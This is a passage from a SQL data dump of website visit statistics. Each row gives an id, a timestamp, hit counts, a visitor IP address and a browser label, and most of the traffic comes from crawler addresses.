other'),(175757,1510232226,1,1,0,0,'178.154.200.7','other'),(175758,1510232572,1,1,0,0,'217.69.134.160','other'),(175759,1510233094,1,1,0,0,'94.178.147.125','firefox'),(175760,1510233120,1,1,0,0,'31.13.114.69','other'),(175761,1510233229,1,1,0,0,'173.252.84.91','other'),(175762,1510233255,2,2,0,0,'91.196.178.67','chrome'),(175763,1510233328,1,1,0,0,'31.13.113.189','other'),(175764,1510233448,1,1,0,0,'91.209.11.236','other'),(175765,1510233867,3,3,0,0,'35.184.189.105','other'),(175766,1510234183,1,1,0,0,'91.196.178.70','chrome'),(175767,1510234242,1,1,0,0,'91.196.178.40','chrome'),(175768,1510234771,1,1,0,0,'216.244.66.237','other'),(175769,1510235110,1,1,0,0,'178.154.171.60','other'),(175770,1510235124,1,1,0,0,'37.9.113.82','other'),(175771,1510235127,1,1,0,0,'5.45.207.30','other'),(175772,1510235511,1,1,0,0,'8.29.198.25','other'),(175773,1510236575,1,1,0,0,'178.154.171.88','other'),(175774,1510236681,1,1,0,0,'5.45.207.49','other'),(175775,1510236881,1,1,0,0,'178.154.200.7','other'),(175776,1510236894,1,1,0,0,'37.9.113.132','other'),(175777,1510237209,1,1,0,0,'173.252.121.114','other'),(175778,1510237537,1,1,0,0,'91.196.178.162','chrome'),(175779,1510237929,1,1,0,0,'213.180.203.7','other'),(175780,1510238041,1,1,0,0,'91.196.179.33','chrome'),(175781,1510238043,1,1,0,0,'31.13.113.17','other'),(175782,1510238124,1,1,0,0,'194.187.216.34','chrome'),(175783,1510238370,1,1,0,0,'217.182.132.188','other'),(175784,1510238492,1,1,0,0,'91.196.178.104','chrome'),(175785,1510238637,1,1,0,0,'91.196.178.34','chrome'),(175786,1510239100,1,0,1,0,'66.249.76.113',''),(175787,1510239175,1,1,0,0,'217.182.132.61','other'),(175788,1510239412,1,1,0,0,'162.210.196.98','other'),(175789,1510239473,1,1,0,0,'95.132.48.7','chrome'),(175790,1510240045,1,1,0,0,'213.180.203.40','other'),(175791,1510240594,1,1,0,0,'213.180.203.7','other'),(175792,1510241046,1,1,0,0,'37.55.181.121','chrome'),(175793,1510241247,1,1,0,0,'66.249.65.105','chrome'),(175794,1510241271,2,2,0,0,'51.255.71.121','other'),(175795,1510241558,1,1,0,0,'217.182.132.180','other'),(175796,1510242648,1,1,0,0,'37.9.113.100','other'),(175797,1510242750,1,1,0,0,'51.255.65.60','other'),(175798,1510242896,1,1,0,0,'151.80.27.116','other'),(175799,1510242916,1,1,0,0,'137.74.207.101','other'),(175800,1510242968,1,1,0,0,'66.249.65.125','chrome'),(175801,1510243506,1,1,0,0,'217.182.132.57','other'),(175802,1510244119,1,1,0,0,'178.154.171.81','other'),(175803,1510244428,1,1,0,0,'51.255.65.2','other'),(175804,1510244452,1,1,0,0,'213.180.203.40','other'),(175805,1510244972,1,1,0,0,'141.8.132.19','other'),(175806,1510245119,1,1,0,0,'51.255.65.16','other'),(175807,1510246338,1,1,0,0,'8.29.198.26','other'),(175808,1510246962,1,1,0,0,'51.255.65.82','other'),(175809,1510247203,1,1,0,0,'178.95.156.151','chrome'),(175810,1510247599,1,1,0,0,'51.255.65.68','other'),(175811,1510247667,1,1,0,0,'207.46.13.16','other'),(175812,1510247878,1,1,0,0,'94.178.147.125','chrome'),(175813,1510248143,1,1,0,0,'137.74.201.108','other'),(175814,1510248290,1,1,0,0,'66.249.65.121','chrome'),(175815,1510248496,1,1,0,0,'51.255.65.35','other'),(175816,1510248856,1,1,0,0,'188.166.57.126','chrome'),(175817,1510248935,1,1,0,0,'137.74.207.110','other'),(175818,1510249082,1,1,0,0,'51.255.65.7','other'),(175819,1510249158,1,1,0,0,'51.255.65.54','other'),(175820,1510249262,1,1,0,0,'217.182.132.191','other'),(175821,1510249322,1,1,0,0,'66.249.65.99','chrome'),(175822,1510249334,2,0,2,0,'66.249.65.125',''),(175823,1510249436,49,49,0,0,'88.198.54.49','other'),(175824,1510249892,1,1,0,0,'91.196.178.70','chrome'),(175825,1510249963,1,1,0,0,'149.154.167.161','other'),(175826,1510250153,1,1,0,0,'217.182.132.19','other'),(175827,1510250264,1,1,0,0,'46.211.129.156','other'),(175828,1510250266,1,1,0,0,'188.163.18.1','chrome'),(175829,1510250655,1,1,0,0,'31.13.113.91','other'),(175830,1510251011,1,1,0,0,'217.182.132.90','other'),(175831,1510251553,1,1,0,0,'137.74.207.109','other'),(175832,1510252413,1,1,0,0,'137.74.207.108','other'),(175833,1510252665,1,1,0,0,'51.255.65.65','other'),(175834,1510253245,1,1,0,0,'137.74.201.99','other'),(175835,1510253306,1,1,0,0,'51.255.71.116','other'),(175836,1510253380,1,1,0,0,'51.255.71.132','other'),(175837,1510253454,1,1,0,0,'207.46.13.16','other'),(175838,1510253461,1,1,0,0,'207.46.13.100','other'),(175839,1510254164,1,1,0,0,'51.255.71.98','other'),(175840,1510254370,1,1,0,0,'217.182.132.75','other'),(175841,1510254461,1,1,0,0,'217.182.132.157','other'),(175842,1510254757,1,1,0,0,'137.74.201.100','other'),(175843,1510255095,1,1,0,0,'164.132.162.153','other'),(175844,1510255233,1,1,0,0,'91.196.178.166','chrome'),(175845,1510255684,1,1,0,0,'51.255.65.12','other'),(175846,1510256262,1,1,0,0,'51.255.65.80','other'),(175847,1510256721,1,1,0,0,'217.182.132.60','other'),(175848,1510257094,1,1,0,0,'217.182.132.241','other'),(175849,1510257128,1,1,0,0,'51.255.65.14','other'),(175850,1510257168,1,1,0,0,'8.29.198.25','other'),(175851,1510257707,1,1,0,0,'51.255.65.25','other'),(175852,1510257717,1,1,0,0,'54.165.59.7','other'),(175853,1510258007,1,1,0,0,'217.182.132.184','other'),(175854,1510258248,1,1,0,0,'217.182.132.150','other'),(175855,1510258331,1,1,0,0,'151.80.27.116','other'),(175856,1510258957,1,1,0,0,'137.74.207.188','other'),(175857,1510259982,1,0,1,0,'66.249.76.113',''),(175858,1510260256,1,1,0,0,'51.255.65.9','other'),(175859,1510260335,1,1,0,0,'217.182.132.36','other'),(175860,1510260630,1,1,0,0,'217.182.132.177','other'),(175861,1510261613,1,1,0,0,'51.255.65.78','other'),(175862,1510261993,1,1,0,0,'51.255.65.60','other'),(175863,1510262086,1,1,0,0,'46.201.113.31','chrome'),(175864,1510262188,2,2,0,0,'51.255.65.27','other'),(175865,1510262484,1,1,0,0,'217.182.132.5','other'),(175866,1510263244,1,1,0,0,'51.255.65.85','other'),(175867,1510263289,1,0,1,0,'66.249.76.112',''),(175868,1510263661,1,1,0,0,'51.255.71.118','other'),(175869,1510264530,1,1,0,0,'217.182.132.78','other'),(175870,1510264669,1,1,0,0,'51.255.65.79','other'),(175871,1510265355,1,1,0,0,'137.74.207.114','other'),(175872,1510265371,1,0,1,0,'66.249.65.105',''),(175873,1510266094,1,1,0,0,'137.74.207.159','other'),(175874,1510266169,1,1,0,0,'217.182.132.157','other'),(175875,1510266593,1,1,0,0,'217.182.132.78','other'),(175876,1510266805,1,1,0,0,'51.255.65.78','other'),(175877,1510266900,1,1,0,0,'51.255.65.61','other'),(175878,1510267346,1,1,0,0,'217.182.132.148','other'),(175879,1510267955,2,2,0,0,'217.182.132.33','other'),(175880,1510268004,1,1,0,0,'8.29.198.25','other'),(175881,1510269094,1,1,0,0,'217.182.132.57','other'),(175882,1510269155,1,1,0,0,'217.182.132.54','other'),(175883,1510269637,1,1,0,0,'51.255.65.19','other'),(175884,1510269728,1,1,0,0,'217.182.132.154','other'),(175885,1510269842,1,1,0,0,'217.182.132.146','other'),(175886,1510269989,1,1,0,0,'173.212.228.89','other'),(175887,1510270253,1,0,1,0,'66.249.65.121',''),(175888,1510270378,1,1,0,0,'141.8.142.74','other'),(175889,1510270505,1,1,0,0,'51.255.65.20','other'),(175890,1510270509,1,1,0,0,'217.182.132.56','other'),(175891,1510270610,1,1,0,0,'51.255.65.73','other'),(175892,1510271392,1,1,0,0,'178.154.171.88','other'),(175893,1510271861,1,1,0,0,'217.182.132.68','other'),(175894,1510271932,1,1,0,0,'217.182.132.155','other'),(175895,1510271953,1,0,1,0,'66.249.65.99',''),(175896,1510272759,1,1,0,0,'51.255.65.91','other'),(175897,1510272981,1,1,0,0,'37.9.113.134','other'),(175898,1510273324,1,1,0,0,'141.8.142.74','other'),(175899,1510273407,1,1,0,0,'207.46.13.100','other'),(175900,1510273573,1,1,0,0,'217.182.132.22','other'),(175901,1510275143,1,1,0,0,'217.182.132.51','other'),(175902,1510275209,1,1,0,0,'217.182.132.67','other'),(175903,1510275534,1,1,0,0,'178.154.171.88','other'),(175904,1510276223,1,1,0,0,'217.182.132.182','other'),(175905,1510276518,1,1,0,0,'217.182.132.55','other'),(175906,1510276657,1,1,0,0,'51.255.65.19','other'),(175907,1510276733,1,1,0,0,'141.8.142.74','other'),(175908,1510276940,1,1,0,0,'217.182.132.73','other'),(175909,1510276973,1,0,1,0,'66.249.76.113',''),(175910,1510277181,1,1,0,0,'217.182.132.153','other'),(175911,1510277322,1,1,0,0,'176.31.231.10','other'),(175912,1510277510,1,1,0,0,'51.255.65.45','other'),(175913,1510277562,1,1,0,0,'37.9.113.115','other'),(175914,1510277889,1,1,0,0,'178.154.200.7','other'),(175915,1510278479,1,1,0,0,'217.182.132.62','other'),(175916,1510278755,1,0,1,0,'66.249.76.113',''),(175917,1510278831,1,1,0,0,'8.29.198.26','other'),(175918,1510279279,1,1,0,0,'87.250.224.46','other'),(175919,1510279976,3,3,0,0,'141.8.142.74','other'),(175920,1510280571,1,0,1,0,'66.249.76.113',''),(175921,1510280658,1,1,0,0,'37.9.113.134','other'),(175922,1510280871,1,1,0,0,'51.255.65.63','other'),(175923,1510281020,1,1,0,0,'51.255.71.117','other'),(175924,1510281239,1,1,0,0,'141.8.142.74','other'),(175925,1510281500,1,1,0,0,'217.182.132.84','other'),(175926,1510281868,1,0,1,0,'66.249.76.114',''),(175927,1510281930,1,1,0,0,'178.154.171.88','other'),(175928,1510282013,2,2,0,0,'216.244.66.237','other'),(175929,1510282063,1,1,0,0,'164.132.162.187','other'),(175930,1510282419,1,1,0,0,'137.74.207.109','other'),(175931,1510282761,1,1,0,0,'37.9.113.100','other'),(175932,1510283353,1,1,0,0,'51.255.65.65','other'),(175933,1510283613,1,1,0,0,'51.255.71.120','other'),(175934,1510283637,1,1,0,0,'217.182.132.190','other'),(175935,1510283753,1,1,0,0,'217.182.132.16','other'),(175936,1510284316,1,1,0,0,'40.77.167.73','other'),(175937,1510284319,1,1,0,0,'141.8.142.74','other'),(175938,1510284451,1,1,0,0,'51.255.71.111','other'),(175939,1510284609,1,1,0,0,'217.182.132.67','other'),(175940,1510284642,1,1,0,0,'180.76.15.139','other'),(175941,1510284731,1,1,0,0,'51.255.65.8','other'),(175942,1510286813,1,1,0,0,'207.46.13.100','other'),(175943,1510287093,1,1,0,0,'51.255.65.35','other'),(175944,1510287282,2,0,2,0,'66.249.65.99',''),(175945,1510287588,9,9,0,0,'188.165.214.26','other'),(175946,1510287590,1,1,0,0,'217.182.132.22','other'),(175947,1510287809,2,0,2,0,'66.249.76.151',''),(175948,1510287828,1,0,1,0,'66.249.76.147',''),(175949,1510287849,1,1,0,0,'164.132.162.158','other'),(175950,1510288361,1,0,1,0,'66.249.65.103',''),(175951,1510288601,1,1,0,0,'51.255.65.21','other'),(175952,1510288947,1,1,0,0,'51.255.65.44','other'),(175953,1510289395,1,1,0,0,'51.255.65.81','other'),(175954,1510289664,1,1,0,0,'8.29.198.27','other'),(175955,1510289993,1,1,0,0,'207.46.13.100','other'),(175956,1510290042,1,1,0,0,'217.182.132.187','other'),(175957,1510290239,1,1,0,0,'178.154.200.32','other'),(175958,1510290351,1,1,0,0,'51.255.65.66','other'),(175959,1510290352,1,1,0,0,'217.182.132.72','other'),(175960,1510290506,1,1,0,0,'137.74.203.194','other'),(175961,1510291172,1,1,0,0,'51.255.71.131','other'),(175962,1510291463,1,1,0,0,'217.182.132.34','other'),(175963,1510291527,1,1,0,0,'178.154.171.60','other'),(175964,1510292081,1,1,0,0,'217.182.132.52','other'),(175965,1510292271,1,1,0,0,'217.182.132.193','other'),(175966,1510292984,1,1,0,0,'207.46.13.95','other'),(175967,1510293152,1,1,0,0,'51.255.71.131','other'),(175968,1510293235,1,1,0,0,'87.250.224.46','other'),(175969,1510293293,1,1,0,0,'51.255.65.83','other'),(175970,1510294199,1,1,0,0,'51.255.65.95','other'),(175971,1510294394,2,2,0,0,'87.250.224.46','other'),(175972,1510294707,1,1,0,0,'40.77.167.73','other'),(175973,1510294761,1,1,0,0,'51.255.71.111','other'),(175974,1510295133,1,1,0,0,'217.182.132.56','other'),(175975,1510295259,1,1,0,0,'213.180.203.8','other'),(175976,1510295374,1,1,0,0,'5.45.207.82','other'),(175977,1510295385,1,1,0,0,'5.45.207.58','other'),(175978,1510295419,1,1,0,0,'178.154.171.10','other'),(175979,1510295424,1,1,0,0,'178.154.171.81','other'),(175980,1510295448,1,1,0,0,'141.8.132.22','other'),(175981,1510295716,1,1,0,0,'37.9.113.157','other'),(175982,1510296202,1,0,1,0,'66.249.65.99',''),(175983,1510296548,1,1,0,0,'91.196.178.165','chrome'),(175984,1510296715,1,1,0,0,'141.8.132.19','other'),(175985,1510296719,1,1,0,0,'37.9.113.157','other'),(175986,1510296865,1,1,0,0,'213.180.203.7','other'),(175987,1510296890,1,1,0,0,'217.182.132.28','other'),(175988,1510296956,1,1,0,0,'217.182.132.67','other'),(175989,1510297001,1,1,0,0,'37.9.113.101','other'),(175990,1510297206,1,1,0,0,'217.182.132.51','other'),(175991,1510297227,1,1,0,0,'151.80.27.118','other'),(175992,1510297261,1,1,0,0,'178.154.171.60','other'),(175993,1510297462,1,1,0,0,'51.255.71.111','other'),(175994,1510297584,1,1,0,0,'5.45.207.82','other'),(175995,1510297732,1,1,0,0,'217.182.132.81','other'),(175996,1510298000,1,1,0,0,'66.249.65.105','chrome'),(175997,1510298082,1,1,0,0,'37.9.113.100','other'),(175998,1510299461,1,1,0,0,'141.8.142.74','other'),(175999,1510299833,1,1,0,0,'217.182.132.64','other'),(176000,1510300054,1,1,0,0,'51.255.71.133','other'),(176001,1510300194,1,1,0,0,'51.255.65.60','other'),(176002,1510300324,3,3,0,0,'46.229.168.66','other'),(176003,1510300336,5,5,0,0,'46.229.168.80','other'),(176004,1510300353,1,1,0,0,'217.182.132.170','other'),(176005,1510300370,4,4,0,0,'46.229.168.67','other'),(176006,1510300397,2,2,0,0,'46.229.168.78','other'),(176007,1510300419,3,3,0,0,'46.229.168.74','other'),(176008,1510300426,4,4,0,0,'46.229.168.65','other'),(176009,1510300467,5,5,0,0,'46.229.168.70','other'),(176010,1510300482,3,3,0,0,'46.229.168.71','other'),(176011,1510300514,1,1,0,0,'8.29.198.25','other'),(176012,1510300518,3,3,0,0,'46.229.168.76','other'),(176013,1510300577,2,2,0,0,'46.229.168.69','other'),(176014,1510300593,7,7,0,0,'46.229.168.79','other'),(176015,1510300612,2,2,0,0,'46.229.168.68','other'),(176016,1510300631,8,8,0,0,'46.229.168.73','other'),(176017,1510300653,4,4,0,0,'46.229.168.72','other'),(176018,1510300850,4,4,0,0,'46.229.168.77','other'),(176019,1510300976,1,1,0,0,'46.229.168.75','other'),(176020,1510301295,4,4,0,0,'46.229.168.66','other'),(176021,1510301405,6,6,0,0,'46.229.168.65','other'),(176022,1510301436,5,5,0,0,'46.229.168.71','other'),(176023,1510301520,1,1,0,0,'46.229.168.78','other'),(176024,1510301532,3,3,0,0,'46.229.168.79','other'),(176025,1510301550,2,2,0,0,'46.229.168.74','other'),(176026,1510301641,2,2,0,0,'46.229.168.72','other'),(176027,1510301677,8,8,0,0,'46.229.168.69','other'),(176028,1510301692,4,4,0,0,'46.229.168.76','other'),(176029,1510301716,4,4,0,0,'46.229.168.68','other'),(176030,1510301765,3,3,0,0,'46.229.168.73','other'),(176031,1510301804,7,7,0,0,'46.229.168.70','other'),(176032,1510301859,5,5,0,0,'46.229.168.80','other'),(176033,1510302006,9,9,0,0,'46.229.168.67','other'),(176034,1510302027,1,1,0,0,'91.196.178.67','chrome'),(176035,1510302030,3,3,0,0,'46.229.168.77','other'),(176036,1510302364,1,1,0,0,'46.229.168.65','other'),(176037,1510302385,1,0,1,0,'66.249.76.112',''),(176038,1510302446,7,7,0,0,'46.229.168.71','other'),(176039,1510302539,6,6,0,0,'46.229.168.66','other'),(176040,1510302548,7,7,0,0,'46.229.168.78','other'),(176041,1510302610,7,7,0,0,'46.229.168.74','other'),(176042,1510302722,7,7,0,0,'46.229.168.69','other'),(176043,1510302742,5,5,0,0,'46.229.168.72','other'),(176044,1510302953,2,2,0,0,'46.229.168.67','other'),(176045,1510302973,1,1,0,0,'37.52.16.202','chrome'),(176046,1510302982,6,6,0,0,'46.229.168.80','other'),(176047,1510303026,4,4,0,0,'46.229.168.68','other'),(176048,1510303088,4,4,0,0,'46.229.168.79','other'),(176049,1510303230,3,3,0,0,'46.229.168.76','other'),(176050,1510303237,4,4,0,0,'46.229.168.73','other'),(176051,1510303448,7,7,0,0,'46.229.168.65','other'),(176052,1510303519,6,6,0,0,'46.229.168.71','other'),(176053,1510303582,8,8,0,0,'46.229.168.77','other'),(176054,1510303590,4,4,0,0,'46.229.168.66','other'),(176055,1510303683,4,4,0,0,'46.229.168.72','other'),(176056,1510303724,1,1,0,0,'188.166.93.95','chrome'),(176057,1510303739,6,6,0,0,'46.229.168.69','other'),(176058,1510303796,7,7,0,0,'46.229.168.70','other'),(176059,1510303811,5,5,0,0,'46.229.168.74','other'),(176060,1510303946,4,4,0,0,'46.229.168.68','other'),(176061,1510303961,1,1,0,0,'46.229.168.67','other'),(176062,1510303999,3,3,0,0,'46.229.168.78','other'),(176063,1510304049,3,3,0,0,'46.229.168.79','other'),(176064,1510304180,1,0,1,0,'66.249.65.105',''),(176065,1510304267,8,8,0,0,'46.229.168.73','other'),(176066,1510304337,2,2,0,0,'46.229.168.80','other'),(176067,1510304393,8,8,0,0,'46.229.168.76','other'),(176068,1510304488,3,3,0,0,'46.229.168.77','other'),(176069,1510304599,3,3,0,0,'46.229.168.66','other'),(176070,1510304667,4,4,0,0,'46.229.168.65','other'),(176071,1510304742,4,4,0,0,'46.229.168.74','other'),(176072,1510304815,4,4,0,0,'46.229.168.71','other'),(176073,1510304864,1,1,0,0,'92.112.45.86','chrome'),(176074,1510304905,2,2,0,0,'46.229.168.68','other'),(176075,1510304967,1,1,0,0,'46.229.168.79','other'),(176076,1510304979,1,1,0,0,'213.111.209.109','chrome'),(176077,1510305038,3,3,0,0,'46.229.168.67','other'),(176078,1510305073,1,1,0,0,'46.229.168.70','other'),(176079,1510305256,1,1,0,0,'66.249.76.137','chrome'),(176080,1510305726,1,1,0,0,'188.166.73.243','chrome'),(176081,1510306384,1,1,0,0,'78.111.190.7','chrome'),(176082,1510306558,1,1,0,0,'141.8.142.74','other'),(176083,1510308508,1,1,0,0,'91.196.178.67','chrome'),(176084,1510308775,1,0,1,0,'66.249.65.123',''),(176085,1510308786,1,1,0,0,'194.44.222.247','chrome'),(176086,1510308902,1,1,0,0,'130.180.208.57','chrome'),(176087,1510309321,1,0,1,0,'66.249.65.103',''),(176088,1510309381,1,0,1,0,'66.249.76.112',''),(176089,1510309575,1,1,0,0,'204.79.180.9','msie'),(176090,1510310165,1,1,0,0,'91.196.178.136','chrome'),(176091,1510311169,1,1,0,0,'91.196.178.104','chrome'),(176092,1510311349,1,1,0,0,'8.29.198.25','other'),(176093,1510311392,85,85,0,0,'69.30.198.202','other'),(176094,1510311874,1,1,0,0,'87.250.224.46','other'),(176095,1510311978,1,1,0,0,'141.8.142.74','other'),(176096,1510313218,1,1,0,0,'91.196.178.136','chrome'),(176097,1510313522,1,0,1,0,'66.249.76.113',''),(176098,1510313654,1,1,0,0,'91.196.178.136','firefox'),(176099,1510314069,2,2,0,0,'141.8.142.74','other'),(176100,1510314527,1,1,0,0,'180.76.15.7','other'),(176101,1510314891,1,1,0,0,'66.249.76.113','chrome'),(176102,1510315042,1,1,0,0,'66.249.76.131','chrome'),(176103,1510315316,1,1,0,0,'51.255.71.116','other'),(176104,1510315422,1,1,0,0,'94.156.144.191','firefox'),(176105,1510315882,1,1,0,0,'66.249.76.114','chrome'),(176106,1510315935,1,1,0,0,'66.249.65.99','chrome'),(176107,1510316392,1,1,0,0,'51.255.65.51','other'),(176108,1510316403,1,1,0,0,'137.74.203.194','other'),(176109,1510316617,1,1,0,0,'91.196.178.136','chrome'),(176110,1510316927,2,2,0,0,'157.55.39.63','other'),(176111,1510316989,1,0,1,0,'66.249.76.114',''),(176112,1510317331,1,1,0,0,'37.52.120.220','chrome'),(176113,1510317371,1,1,0,0,'141.8.142.74','other'),(176114,1510317385,1,1,0,0,'217.182.132.51','other'),(176115,1510317661,1,1,0,0,'91.196.178.70','chrome'),(176116,1510318011,1,1,0,0,'62.210.202.86','chrome'),(176117,1510318669,1,1,0,0,'217.182.132.54','other'),(176118,1510318703,1,1,0,0,'194.37.248.11','firefox'),(176119,1510318991,1,1,0,0,'217.182.132.57','other'),(176120,1510319320,1,1,0,0,'51.255.71.112','other'),(176121,1510319714,1,1,0,0,'51.255.65.79','other'),(176122,1510319721,1,1,0,0,'51.255.71.132','other'),(176123,1510319795,1,1,0,0,'178.154.171.88','other'),(176124,1510319849,1,1,0,0,'217.182.132.150','other'),(176125,1510319882,1,0,1,0,'66.249.65.105',''),(176126,1510319986,1,1,0,0,'141.8.142.74','other'),(176127,1510320302,1,1,0,0,'178.95.62.89','chrome'),(176128,1510320502,1,1,0,0,'51.255.65.65','other'),(176129,1510321227,1,0,1,0,'66.249.76.131',''),(176130,1510321269,1,1,0,0,'137.74.207.102','other'),(176131,1510321344,1,1,0,0,'141.8.142.74','other'),(176132,1510322180,1,1,0,0,'8.29.198.25','other'),(176133,1510322339,1,1,0,0,'51.255.71.130','other'),(176134,1510322640,2,2,0,0,'216.244.66.194','other'),(176135,1510323101,1,1,0,0,'37.9.113.182','other'),(176136,1510323245,1,1,0,0,'51.255.65.72','other'),(176137,1510323496,1,1,0,0,'91.196.178.133','chrome'),(176138,1510323626,1,1,0,0,'66.249.76.137','chrome'),(176139,1510323669,1,1,0,0,'66.249.65.99','chrome'),(176140,1510323835,1,1,0,0,'51.255.65.69','other'),(176141,1510324708,1,1,0,0,'217.182.132.55','other'),(176142,1510326153,2,0,2,0,'66.249.65.105',''),(176143,1510326430,1,1,0,0,'213.180.203.8','other'),(176144,1510326608,1,1,0,0,'216.244.66.246','other'),(176145,1510327012,1,1,0,0,'91.196.178.68','chrome'),(176146,1510327110,1,1,0,0,'31.13.106.119','other'),(176147,1510327598,1,1,0,0,'217.182.132.14','other'),(176148,1510327846,1,1,0,0,'217.182.132.37','other'),(176149,1510327969,1,1,0,0,'217.182.132.90','other'),(176150,1510329033,1,1,0,0,'216.244.66.194','other'),(176151,1510329379,1,0,1,0,'66.249.76.131',''),(176152,1510329452,1,1,0,0,'209.90.225.243','chrome'),(176153,1510330326,1,0,1,0,'66.249.76.137',''),(176154,1510330401,1,1,0,0,'91.196.178.72','chrome'),(176155,1510330457,1,1,0,0,'178.154.171.88','other'),(176156,1510330625,1,1,0,0,'94.156.144.191','firefox'),(176157,1510330702,1,1,0,0,'51.255.65.7','other'),(176158,1510330831,1,1,0,0,'180.76.15.143','other'),(176159,1510331364,1,1,0,0,'91.196.178.72','chrome'),(176160,1510331670,1,1,0,0,'51.255.71.132','other'),(176161,1510331703,1,1,0,0,'137.74.207.101','other'),(176162,1510331824,1,1,0,0,'141.8.142.74','other'),(176163,1510331825,1,1,0,0,'178.154.171.88','other'),(176164,1510331875,1,1,0,0,'109.63.169.8','msie'),(176165,1510331877,1,1,0,0,'217.182.132.179','other'),(176166,1510332255,1,1,0,0,'51.255.65.53','other'),(176167,1510332636,3,3,0,0,'178.154.171.55','other'),(176168,1510332787,1,1,0,0,'37.9.113.138','other'),(176169,1510332836,2,2,0,0,'213.180.203.7','other'),(176170,1510332856,1,1,0,0,'141.8.142.74','other'),(176171,1510332951,1,0,1,0,'66.249.76.89',''),(176172,1510333019,1,1,0,0,'8.29.198.27','other'),(176173,1510333075,2,2,0,0,'37.9.113.100','other'),(176174,1510333117,3,3,0,0,'87.250.224.46','other'),(176175,1510333120,1,1,0,0,'37.9.113.74','other'),(176176,1510333218,1,1,0,0,'217.182.132.148','other'),(176177,1510333236,2,2,0,0,'178.154.200.32','other'),(176178,1510333314,2,2,0,0,'37.9.113.182','other'),(176179,1510333398,1,1,0,0,'178.154.171.88','other'),(176180,1510333415,1,1,0,0,'216.244.66.194','other'),(176181,1510333428,1,1,0,0,'178.154.171.81','other'),(176182,1510333508,2,2,0,0,'37.9.113.132','other'),(176183,1510333531,1,1,0,0,'5.45.207.58','other'),(176184,1510333626,1,1,0,0,'141.8.132.22','other'),(176185,1510333691,1,1,0,0,'178.154.200.7','other'),(176186,1510333727,1,1,0,0,'178.154.171.55','other'),(176187,1510334037,1,1,0,0,'51.255.65.74','other'),(176188,1510334180,1,1,0,0,'217.182.132.70','other'),(176189,1510334448,1,1,0,0,'216.244.66.246','other'),(176190,1510334449,1,1,0,0,'87.250.224.46','other'),(176191,1510334618,1,0,1,0,'66.249.76.108',''),(176192,1510334661,2,2,0,0,'37.9.113.182','other'),(176193,1510335175,1,1,0,0,'95.132.28.248','firefox'),(176194,1510335441,1,1,0,0,'37.9.113.115','other'),(176195,1510335446,1,1,0,0,'35.184.189.105','other'),(176196,1510335839,1,1,0,0,'216.244.66.237','other'),(176197,1510336282,2,1,1,0,'66.249.76.108',''),(176198,1510336316,1,0,1,0,'66.249.65.99',''),(176199,1510338017,1,1,0,0,'91.196.178.167','chrome'),(176200,1510338082,1,1,0,0,'216.244.66.237','other'),(176201,1510338172,1,1,0,0,'108.59.8.70','other'),(176202,1510338216,1,1,0,0,'66.249.76.109','chrome'),(176203,1510338541,2,2,0,0,'66.249.65.105','chrome'),(176204,1510338941,1,1,0,0,'51.255.65.50','other'),(176205,1510339063,1,1,0,0,'157.55.39.63','other'),(176206,1510339426,1,1,0,0,'137.74.207.101','other'),(176207,1510339579,1,0,1,0,'66.249.65.105',''),(176208,1510339882,1,1,0,0,'66.249.65.105','chrome'),(176209,1510339944,3,3,0,0,'46.229.168.79','other'),(176211,1510339963,7,7,0,0,'46.229.168.76','other'),(176212,1510339964,3,3,0,0,'46.229.168.65','other'),(176213,1510339998,8,8,0,0,'46.229.168.67','other'),(176214,1510340040,5,5,0,0,'46.229.168.66','other'),(176215,1510340078,4,4,0,0,'46.229.168.74','other'),(176216,1510340139,3,3,0,0,'46.229.168.71','other'),(176217,1510340189,3,3,0,0,'46.229.168.78','other'),(176218,1510340283,3,3,0,0,'46.229.168.72','other'),(176219,1510340334,6,6,0,0,'46.229.168.69','other'),(176220,1510340490,8,8,0,0,'46.229.168.70','other'),(176221,1510340722,5,5,0,0,'46.229.168.75','other'),(176222,1510340788,3,3,0,0,'35.184.189.105','other'),(176223,1510340936,8,8,0,0,'46.229.168.65','other'),(176224,1510341002,1,1,0,0,'46.229.168.79','other'),(176225,1510341004,1,1,0,0,'46.229.168.66','other'),(176226,1510341011,1,1,0,0,'46.229.168.76','other'),(176227,1510341012,1,1,0,0,'137.74.207.164','other'),(176228,1510341031,3,3,0,0,'46.229.168.67','other'),(176229,1510341143,1,1,0,0,'46.229.168.78','other'),(176230,1510341158,4,4,0,0,'46.229.168.71','other'),(176231,1510341160,6,6,0,0,'46.229.168.77','other'),(176232,1510341161,2,0,2,0,'66.249.76.109',''),(176233,1510341213,1,1,0,0,'46.101.159.215','other'),(176234,1510341308,1,1,0,0,'217.182.132.174','other'),(176235,1510341356,9,9,0,0,'46.229.168.73','other'),(176236,1510341394,3,3,0,0,'46.229.168.70','other'),(176237,1510341423,5,5,0,0,'46.229.168.69','other'),(176238,1510341510,1,1,0,0,'51.255.71.128','other'),(176239,1510341638,6,6,0,0,'46.229.168.74','other'),(176240,1510341839,2,2,0,0,'46.229.168.65','other'),(176241,1510341856,4,4,0,0,'46.229.168.80','other'),(176242,1510341970,1,0,1,0,'66.249.65.105',''),(176243,1510342008,1,1,0,0,'51.255.65.25','other'),(176244,1510342153,5,5,0,0,'46.229.168.76','other'),(176245,1510342157,7,7,0,0,'46.229.168.71','other'),(176246,1510342210,3,3,0,0,'46.229.168.68','other'),(176247,1510342225,1,1,0,0,'40.77.167.73','other'),(176248,1510342278,9,9,0,0,'46.229.168.67','other'),(176249,1510342480,4,4,0,0,'46.229.168.75','other'),(176250,1510342549,3,3,0,0,'46.229.168.73','other'),(176251,1510342555,1,1,0,0,'66.249.76.89','chrome'),(176252,1510342698,4,4,0,0,'46.229.168.79','other'),(176253,1510342806,2,2,0,0,'46.229.168.80','other'),(176254,1510342874,1,0,1,0,'66.249.65.105',''),(176255,1510342892,1,0,1,0,'66.249.65.103',''),(176256,1510342897,5,5,0,0,'46.229.168.74','other'),(176257,1510342955,3,3,0,0,'46.229.168.69','other'),(176258,1510343062,1,1,0,0,'46.229.168.71','other'),(176259,1510343073,2,2,0,0,'46.229.168.77','other'),(176260,1510343120,4,4,0,0,'46.229.168.65','other'),(176261,1510343178,1,1,0,0,'54.165.59.7','other'),(176262,1510343184,7,7,0,0,'46.229.168.68','other'),(176263,1510343207,1,1,0,0,'66.249.65.103','chrome'),(176264,1510343230,5,5,0,0,'46.229.168.70','other'),(176265,1510343238,1,1,0,0,'217.182.132.91','other'),(176266,1510343264,3,3,0,0,'46.229.168.76','other'),(176267,1510343304,1,0,1,0,'66.249.76.108',''),(176268,1510343467,4,4,0,0,'46.229.168.73','other'),(176269,1510343539,5,5,0,0,'46.229.168.78','other'),(176270,1510343644,1,1,0,0,'51.255.65.42','other'),(176271,1510343791,2,2,0,0,'46.229.168.67'